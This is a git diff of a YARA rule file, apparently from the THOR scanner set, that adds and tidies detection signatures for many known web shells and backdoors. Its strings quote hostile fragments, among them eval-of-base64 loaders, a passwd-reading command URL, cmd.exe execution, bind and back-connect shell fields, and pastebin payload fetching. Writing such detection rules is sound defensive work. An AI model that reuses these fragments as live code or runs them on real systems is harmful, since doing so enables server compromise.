Update and rename Webshell-shell.yar to THOR_Webshells.yar

malware/Webshell-shell.yar → malware/THOR_Webshells.yar

@@ -3,7 +3,21 @@
 
 */
 
-import "pe"
+/*
+
+   THOR APT Scanner - Web Shells Extract
+   This rulset is a subset of all hack tool rules included in our
+   APT Scanner THOR - the full featured APT scanner
+
+   We will frequently update this file with new rules rated TLP:WHITE
+
+   Florian Roth
+   BSK Consulting GmbH
+   Web: bsk-consulting.de
+
+   revision: 20150122
+
+*/
 
 rule Weevely_Webshell {
 	meta:
@@ -1672,8 +1686,8 @@ rule webshell_c99_madnet_smowu {
 		$s0 = "//Authentication" fullword
 		$s1 = "$login = \"" fullword
 		$s2 = "eval(gzinflate(base64_decode('"
-		$s4 = "//Pass" 
-		$s5 = "$md5_pass = \"" 
+		$s4 = "//Pass"
+		$s5 = "$md5_pass = \""
 		$s6 = "//If no pass then hash"
 	condition:
 		all of them
@@ -3214,7 +3228,323 @@ rule webshell_webshells_new_Asp {
 		1 of them
 }
 
+/* Update from hackers tool pack */
 
+rule perlbot_pl {
+	meta:
+		description = "Semi-Auto-generated  - file perlbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "7e4deb9884ffffa5d82c22f8dc533a45"
+	strings:
+		$s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
+		$s1 = "#Acesso a Shel - 1 ON 0 OFF"
+	condition:
+		1 of them
+}
+rule php_backdoor_php {
+	meta:
+		description = "Semi-Auto-generated  - file php-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+	strings:
+		$s0 = "http://michaeldaw.org   2006"
+		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
+		$s3 = "coded by z0mbie"
+	condition:
+		1 of them
+}
+rule Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php {
+	meta:
+		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+	strings:
+		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
+		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
+		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
+	condition:
+		1 of them
+}
+rule Nshell__1__php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "973fc89694097a41e684b43a21b1b099"
+	strings:
+		$s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
+		$s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
+	condition:
+		1 of them
+}
+rule shankar_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file shankar.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "6eb9db6a3974e511b7951b8f7e7136bb"
+	strings:
+		$sAuthor = "ShAnKaR"
+		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
+		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
+	condition:
+		1 of ($s*) and $sAuthor
+}
+rule Casus15_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Casus15.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
+	strings:
+		$s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
+		$s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
+		$s3 = "value='Calistirmak istediginiz "
+	condition:
+		1 of them
+}
+rule small_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file small.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "fcee6226d09d150bfa5f103bee61fbde"
+	strings:
+		$s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
+		$s4 = "@ini_set('error_log',NULL);" fullword
+	condition:
+		2 of them
+}
+rule shellbot_pl {
+	meta:
+		description = "Semi-Auto-generated  - file shellbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
+	strings:
+		$s0 = "ShellBOT"
+		$s1 = "PacktsGr0up"
+		$s2 = "CoRpOrAtIoN"
+		$s3 = "# Servidor de irc que vai ser usado "
+		$s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
+	condition:
+		2 of them
+}
+rule fuckphpshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "554e50c1265bb0934fcc8247ec3b9052"
+	strings:
+		$s0 = "$succ = \"Warning! "
+		$s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"
+		$s2 = "\\*=-- MEMBERS AREA --=*/"
+		$s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
+	condition:
+		2 of them
+}
+rule ngh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file ngh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c372b725419cdfd3f8a6371cfeebc2fd"
+	strings:
+		$s0 = "Cr4sh_aka_RKL"
+		$s1 = "NGH edition"
+		$s2 = "/* connectback-backdoor on perl"
+		$s3 = "<form action=<?=$script?>?act=bindshell method=POST>"
+		$s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"
+	condition:
+		1 of them
+}
+rule jsp_reverse_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8b0e6779f25a17f0ffb3df14122ba594"
+	strings:
+		$s0 = "// backdoor.jsp"
+		$s1 = "JSP Backdoor Reverse Shell"
+		$s2 = "http://michaeldaw.org"
+	condition:
+		2 of them
+}
+rule Tool_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Tool.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
+	strings:
+		$s0 = "mailto:rhfactor@antisocial.com"
+		$s2 = "?raiz=root"
+		$s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"
+		$s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
+	condition:
+		2 of them
+}
+rule NT_Addy_asp {
+	meta:
+		description = "Semi-Auto-generated  - file NT Addy.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2e0d1bae844c9a8e6e351297d77a1fec"
+	strings:
+		$s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
+		$s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
+		$s4 = "RAW D.O.S. COMMAND INTERFACE"
+	condition:
+		1 of them
+}
+rule SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php {
+	meta:
+		description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+	strings:
+		$s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
+		$s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+		$s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
+	condition:
+		1 of them
+}
+rule RemExp_asp {
+	meta:
+		description = "Semi-Auto-generated  - file RemExp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+	strings:
+		$s0 = "<title>Remote Explorer</title>"
+		$s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
+		$s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+	condition:
+		2 of them
+}
+rule phvayvv_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file phvayvv.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "35fb37f3c806718545d97c6559abd262"
+	strings:
+		$s0 = "{mkdir(\"$dizin/$duzenx2\",777)"
+		$s1 = "$baglan=fopen($duzkaydet,'w');"
+		$s2 = "PHVayv 1.0"
+	condition:
+		1 of them
+}
+rule klasvayv_asp {
+	meta:
+		description = "Semi-Auto-generated  - file klasvayv.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "2b3e64bf8462fc3d008a3d1012da64ef"
+	strings:
+		$s1 = "set aktifklas=request.querystring(\"aktifklas\")"
+		$s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
+		$s3 = "<font color=\"#858585\">www.aventgrup.net"
+		$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
+	condition:
+		1 of them
+}
+rule r57shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file r57shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d28445de424594a5f14d0fe2a7c4e94f"
+	strings:
+		$s0 = "r57shell" fullword
+		$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
+		$s2 = "RusH security team"
+		$s3 = "'ru_text12' => 'back-connect"
+	condition:
+		1 of them
+}
+rule rst_sql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file rst_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0961641a4ab2b8cb4d2beca593a92010"
+	strings:
+		$s0 = "C:\\tmp\\dump_"
+		$s1 = "RST MySQL"
+		$s2 = "http://rst.void.ru"
+		$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
+	condition:
+		2 of them
+}
+rule wh_bindshell_py {
+	meta:
+		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "fab20902862736e24aaae275af5e049c"
+	strings:
+		$s0 = "#Use: python wh_bindshell.py [port] [password]"
+		$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
+		$s3 = "#bugz: ctrl+c etc =script stoped=" fullword
+	condition:
+		1 of them
+}
+rule lurm_safemod_on_cgi {
+	meta:
+		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5ea4f901ce1abdf20870c214b3231db3"
+	strings:
+		$s0 = "Network security team :: CGI Shell" fullword
+		$s1 = "#########################<<KONEC>>#####################################" fullword
+		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
+	condition:
+		1 of them
+}
+rule c99madshell_v2_0_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file c99madshell_v2.0.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "d27292895da9afa5b60b9d3014f39294"
+	strings:
+		$s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
+	condition:
+		all of them
+}
+rule backupsql_php_often_with_c99shell {
+	meta:
+		description = "Semi-Auto-generated  - file backupsql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
+	strings:
+		$s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
+		$s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+	condition:
+		all of them
+}
+rule uploader_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file uploader.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0b53b67bb3b004a8681e1458dd1895d0"
+	strings:
+		$s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+		$s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
+		$s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
+	condition:
+		2 of them
+}
+rule telnet_pl {
+	meta:
+		description = "Semi-Auto-generated  - file telnet.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "dd9dba14383064e219e29396e242c1ec"
+	strings:
+		$s0 = "W A R N I N G: Private Server"
+		$s2 = "$Message = q$<pre><font color=\"#669999\"> _____  _____  _____          _____   "
+	condition:
+		all of them
+}
+rule w3d_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file w3d.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "987f66b29bfb209a0b4f097f84f57c3b"
+	strings:
+		$s0 = "W3D Shell"
+		$s1 = "By: Warpboy"
+		$s2 = "No Query Executed"
+	condition:
+		2 of them
+}
 rule WebShell_cgi {
 	meta:
 		description = "Semi-Auto-generated  - file WebShell.cgi.txt"
@@ -3238,8 +3568,6 @@ rule WinX_Shell_html {
 	condition:
 		2 of them
 }
-
-
 rule Dx_php_php {
 	meta:
 		description = "Semi-Auto-generated  - file Dx.php.php.txt"
@@ -3271,7 +3599,7 @@ rule pHpINJ_php_php {
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
 		hash = "d7a4b0df45d34888d5a09f745e85733f"
 	strings:
-		$s1 = "News Remote PHP Shell Injection" 
+		$s1 = "News Remote PHP Shell Injection"
 		$s3 = "Php Shell <br />" fullword
 		$s4 = "<input type = \"text\" name = \"url\" value = \""
 	condition:
@@ -3381,10 +3709,10 @@ rule CmdAsp_asp {
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
 		hash = "64f24f09ec6efaa904e2492dffc518b9"
 	strings:
-		$s0 = "CmdAsp.asp" 
+		$s0 = "CmdAsp.asp"
 		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
-		$s2 = "-- Use a poor man's pipe ... a temp file --" 
-		$s3 = "maceo @ dogmile.com" 
+		$s2 = "-- Use a poor man's pipe ... a temp file --"
+		$s3 = "maceo @ dogmile.com"
 	condition:
 		2 of them
 }
@@ -3395,7 +3723,7 @@ rule simple_backdoor_php {
 		hash = "f091d1b9274c881f8e41b2f96e6b9936"
 	strings:
 		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
-		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" 
+		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->"
 		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
 	condition:
 		2 of them
@@ -3432,7 +3760,7 @@ rule Asmodeus_v0_1_pl {
 		hash = "0978b672db0657103c79505df69cb4bb"
 	strings:
 		$s0 = "[url=http://www.governmentsecurity.org"
-		$s1 = "perl asmodeus.pl client 6666 127.0.0.1" 
+		$s1 = "perl asmodeus.pl client 6666 127.0.0.1"
 		$s2 = "print \"Asmodeus Perl Remote Shell"
 		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
 	condition:
@@ -3492,7 +3820,7 @@ rule SimShell_1_0___Simorgh_Security_MGZ_php {
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
 		hash = "37cb1db26b1b0161a4bf678a6b4565bd"
 	strings:
-		$s0 = "Simorgh Security Magazine " 
+		$s0 = "Simorgh Security Magazine "
 		$s1 = "Simshell.css"
 		$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
 		$s3 = "www.simorgh-ev.com"
@@ -3625,7 +3953,7 @@ rule s72_Shell_v1_1_Coding_html {
 	strings:
 		$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
 		$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
-		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\"" 
+		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""
 	condition:
 		1 of them
 }
@@ -3659,7 +3987,7 @@ rule PHP_Backdoor_Connect_pl_php {
 		hash = "57fcd9560dac244aeaf95fd606621900"
 	strings:
 		$s0 = "LorD of IRAN HACKERS SABOTAGE"
-		$s1 = "LorD-C0d3r-NT" 
+		$s1 = "LorD-C0d3r-NT"
 		$s2 = "echo --==Userinfo==-- ;"
 	condition:
 		1 of them
@@ -4017,7 +4345,7 @@ rule shell_php_php {
 		hash = "1a95f0163b6dea771da1694de13a3d8d"
 	strings:
 		$s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
-		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');" 
+		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');"
 		$s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
 	condition:
 		1 of them
@@ -4081,10 +4409,10 @@ rule cmdjsp_jsp {
 	strings:
 		$s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
 		$s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
-		$s2 = "cmdjsp.jsp" 
+		$s2 = "cmdjsp.jsp"
 		$s3 = "michaeldaw.org" fullword
 	condition:
-		1 of them
+		2 of them
 }
 rule h4ntu_shell__powered_by_tsoi_ {
 	meta:
@@ -4347,7 +4675,7 @@ rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php {
 	strings:
 		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
 		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
-		$s2 = "rst.void.ru" 
+		$s2 = "rst.void.ru"
 	condition:
 		3 of them
 }
@@ -4379,7 +4707,7 @@ rule _wacking_php_php_1_SpecialShell_99_php_php_c100_php {
 	strings:
 		$s0 = "if(eregi(\"./shbd $por\",$scan))"
 		$s1 = "$_POST['backconnectip']"
-		$s2 = "$_POST['backcconnmsg']" 
+		$s2 = "$_POST['backcconnmsg']"
 	condition:
 		1 of them
 }
@@ -4717,12 +5045,13 @@ rule GIFCloaked_Webshell {
 		score = 50
 	strings:
 		$magic = { 47 49 46 38 } /* GIF8 ... */
-		$s0 = "input type"		
+		$s0 = "input type"
 		$s1 = "<%eval request"
 		$s2 = "<%eval(Request.Item["
 		$s3 = "LANGUAGE='VBScript'"
 	condition:
 		( $magic at 0 ) and ( 1 of ($s*) )
+		and not filepath contains "AppData"
 }
 
 rule PHP_Cloaked_Webshell_SuperFetchExec {
@@ -4732,7 +5061,7 @@ rule PHP_Cloaked_Webshell_SuperFetchExec {
 		author = "Florian Roth"
 		score = 50
 	strings:
-		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"		
+		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"
 	condition:
 		$s0
 }
@@ -6301,7 +6630,6 @@ rule hkshell_hkshell {
 	condition:
 		all of them
 }
-
 rule iMHaPFtp {
 	meta:
 		description = "Webshells Auto-generated - file iMHaPFtp.php"
@@ -6332,7 +6660,7 @@ rule DarkSpy105 {
 	condition:
 		all of them
 }
-rule EditServer_3 {
+rule EditServer {
 	meta:
 		description = "Webshells Auto-generated - file EditServer.exe"
 		author = "Yara Bulk Rule Generator by Florian Roth"
@@ -7767,8 +8095,6 @@ rule r57shell_3 {
 	condition:
 		all of them
 }
-
-
 rule HDConfig {
 	meta:
 		description = "Webshells Auto-generated - file HDConfig.exe"
@@ -7811,7 +8137,7 @@ condition:
 }
 
 rule JSP_Browser_APT_webshell {
-	meta: 
+	meta:
 		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
 		author = "F.Roth"
 		date = "10.10.2014"
@@ -7826,7 +8152,7 @@ rule JSP_Browser_APT_webshell {
 }
 
 rule JSP_jfigueiredo_APT_webshell {
-	meta: 
+	meta:
 		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
 		author = "F.Roth"
 		date = "12.10.2014"
@@ -7840,7 +8166,7 @@ rule JSP_jfigueiredo_APT_webshell {
 }
 
 rule JSP_jfigueiredo_APT_webshell_2 {
-	meta: 
+	meta:
 		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
 		author = "F.Roth"
 		date = "12.10.2014"
@@ -7856,7 +8182,7 @@ rule JSP_jfigueiredo_APT_webshell_2 {
 }
 
 rule AJAX_FileUpload_webshell {
-	meta: 
+	meta:
 		description = "AJAX JS/CSS components providing web shell by APT groups"
 		author = "F.Roth"
 		date = "12.10.2014"
@@ -7921,7 +8247,6 @@ rule SoakSoak_Infected_Wordpress {
 		all of ($s*)
 }
 
-
 rule Pastebin_Webshell {
 	meta:
 		description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
@@ -7933,10 +8258,10 @@ rule Pastebin_Webshell {
 		$s0 = "file_get_contents(\"http://pastebin.com" ascii
 		$s1 = "xcurl('http://pastebin.com/download.php" ascii
 		$s2 = "xcurl('http://pastebin.com/raw.php" ascii
-		
+
 		$x0 = "if($content){unlink('evex.php');" ascii
 		$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
-		
+
 		$y0 = "file_put_contents($pth" ascii
 		$y1 = "echo \"<login_ok>" ascii
 		$y2 = "str_replace('* @package Wordpress',$temp" ascii
@@ -7969,3 +8294,278 @@ rule ASPXspy2 {
 	condition:
 		6 of them
 }
+
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-01-11
+	Identifier: Web Shell Repo
+	Reference: https://github.com/nikicat/web-malware-collection
+*/
+
+rule Webshell_27_9_c66_c99 {
+	meta:
+		description = "Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ..."
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash3 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash4 = "80ec7831ae888d5603ed28d81225ed8b256c831077bb8feb235e0a1a9b68b748"
+		hash5 = "6ce99e07aa98ba6dc521c34cf16fbd89654d0ba59194878dffca857a4c34e57b"
+		hash6 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash7 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash8 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash9 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash10 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+	strings:
+		$s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii
+		$s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii
+		$s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii
+	condition:
+		filesize < 685KB and 1 of them
+}
+
+rule Webshell_acid_AntiSecShell_3 {
+	meta:
+		description = "Detects Webshell Acid"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash4 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash5 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash6 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash7 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash8 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash9 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash10 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash11 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash12 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash13 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash14 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash15 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash16 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash17 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+		hash18 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+	strings:
+		$s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii
+		$s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii
+	condition:
+		filesize < 900KB and all of them
+}
+
+rule Webshell_c99_4 {
+	meta:
+		description = "Detects C99 Webshell"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash3 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash4 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
+		hash5 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash6 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash7 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash8 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
+		hash9 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash10 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
+		hash11 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash12 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash13 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+		hash14 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+	strings:
+		$s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii
+		$s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii
+		$s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii
+		$s4 = "$ret = myshellexec($handler);" fullword ascii
+		$s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii
+	condition:
+		filesize < 900KB and 1 of them
+}
+
+rule Webshell_r57shell_2 {
+	meta:
+		description = "Detects Webshell R57"
+		author = "Florian Roth"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		date = "2016-01-11"
+		score = 70
+		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
+		hash2 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
+		hash3 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
+		hash4 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
+		hash5 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
